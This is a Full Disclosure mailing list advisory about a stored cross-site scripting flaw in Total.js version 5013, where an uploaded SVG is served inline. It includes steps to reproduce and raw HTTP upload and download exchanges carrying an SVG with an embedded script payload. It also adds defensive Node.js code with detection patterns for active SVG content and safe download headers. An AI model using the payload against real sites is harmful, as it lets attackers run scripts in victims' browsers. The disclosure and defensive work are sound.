Full Disclosure mailing list archives

Stored Cross-Site Scripting (XSS) via SVG File Upload - totaljsv5013


From: Andrey Stoykov <mwebsec () gmail com>
Date: Sun, 26 Oct 2025 17:55:30 +0000

# Exploit Title: Stored Cross-Site Scripting (XSS) via SVG File Upload - totaljsv5013
# Date: 10/2025
# Exploit Author: Andrey Stoykov
# Version: 5013
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/2025/10/friday-fun-pentest-series-46-stored.html


Stored Cross-Site Scripting (XSS) via SVG File Upload:

Steps to Reproduce:
1. Log in as a user and visit "Layouts"
2. Visit "Files" and click "Upload"
3. Upload an SVG image file with the contents shown below
4. The payload executes when "Download" is clicked, because the file is served inline with its original content-type

// HTTP POST Request - Uploading SVG Image File

POST /admin/upload/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0)
Gecko/20100101 Firefox/145.0
[...]

------geckoformboundary6f751f7129e99de4fcc52bcce109c72
Content-Disposition: form-data; name="file0"; filename="evilsvgfile.svg"
Content-Type: image/svg+xml

<svg xmlns="http://www.w3.org/2000/svg"; viewBox="0 0 96 105">
<html><head><title>test</title></head><body><script>alert('xss');</script></body></html>
</svg>
------geckoformboundary6f751f7129e99de4fcc52bcce109c72--

// HTTP POST Response - Uploading SVG Image File

HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 17:06:41 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 129

[{"id":"JE6g1R1cx61f","name":"evilsvgfile.svg","type":"image/svg+xml","ext":"svg","size":159,"url":"/download/JE6g1R1cx61f.svg"}]

// HTTP GET Request - Triggering the Payload

GET /download/JE6g1R1cx61f.svg HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0)
Gecko/20100101 Firefox/145.0
[...]

// HTTP GET Response - Triggering the Payload

HTTP/1.1 200 OK
last-modified: Sun, 26 Oct 2025 17:06:41 GMT
x-size: 159
etag: 858100
content-type: image/svg+xml
Date: Sun, 26 Oct 2025 17:09:19 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 159

<svg xmlns="http://www.w3.org/2000/svg"; viewBox="0 0 96 105">
<html><head><title>test</title></head><body><script>alert('xss');</script></body></html>
</svg>
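The root cause shown above is that the uploaded SVG is stored verbatim and served back as image/svg+xml, so the browser renders it as a document and runs the script. The following is an added example, not code from the advisory or from Total.js: a server-side pre-upload check that refuses SVGs carrying active content, and the response headers that would keep a stored SVG from executing when fetched. The function names and the benign sample SVG are constructed for this example.

```javascript
// Added example (not part of the advisory or of Total.js): reject SVG uploads
// that contain active content, and serve user files with headers that prevent
// inline script execution. Node.js, no dependencies.

// Constructs that make an SVG executable when a browser renders it as a
// document. Matched case-insensitively on the raw upload text; this is a
// rejecting check, so a single hit is enough to refuse the file.
const ACTIVE_CONTENT = [
  /<\s*script\b/i,                                   // <script> element
  /<\s*foreignObject\b/i,                            // embeds arbitrary HTML
  /\son[a-z]+\s*=/i,                                 // onload=, onclick=, ...
  /(?:href|xlink:href)\s*=\s*["']?\s*javascript:/i,  // javascript: links
  /<\s*(?:iframe|embed|object)\b/i,                  // nested documents/plugins
  /<\s*html\b/i,                                     // HTML document inside SVG (as in the advisory)
];

// Returns the pattern sources that matched, so a log entry can say why the
// upload was refused.
function findActiveContent(svgText) {
  return ACTIVE_CONTENT.filter((re) => re.test(svgText)).map((re) => re.source);
}

function svgUploadAllowed(svgText) {
  return findActiveContent(svgText).length === 0;
}

// Headers for the /download/ path: force a download instead of inline
// rendering, stop MIME sniffing, and deny every script source if the file is
// rendered anyway. The filename is normalised to a safe character set.
function safeDownloadHeaders(filename, contentType) {
  const safeName = filename.replace(/[^\w.\-]/g, '_');
  return {
    'Content-Type': contentType,
    'Content-Disposition': `attachment; filename="${safeName}"`,
    'X-Content-Type-Options': 'nosniff',
    'Content-Security-Policy': "default-src 'none'",
  };
}

// Constructed samples: the payload from the advisory and a benign SVG.
const MALICIOUS_SVG = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 96 105">
<html><head><title>test</title></head><body><script>alert('xss');</script></body></html>
</svg>`;
const BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4"/></svg>';

console.log('malicious allowed:', svgUploadAllowed(MALICIOUS_SVG), findActiveContent(MALICIOUS_SVG));
console.log('benign allowed:', svgUploadAllowed(BENIGN_SVG));
console.log(safeDownloadHeaders('evilsvgfile.svg', 'image/svg+xml'));
```

A text-pattern check is a gate, not a sanitizer; an allow-list DOM sanitizer on a parsed SVG is the stronger option when uploads must still render inline.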
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/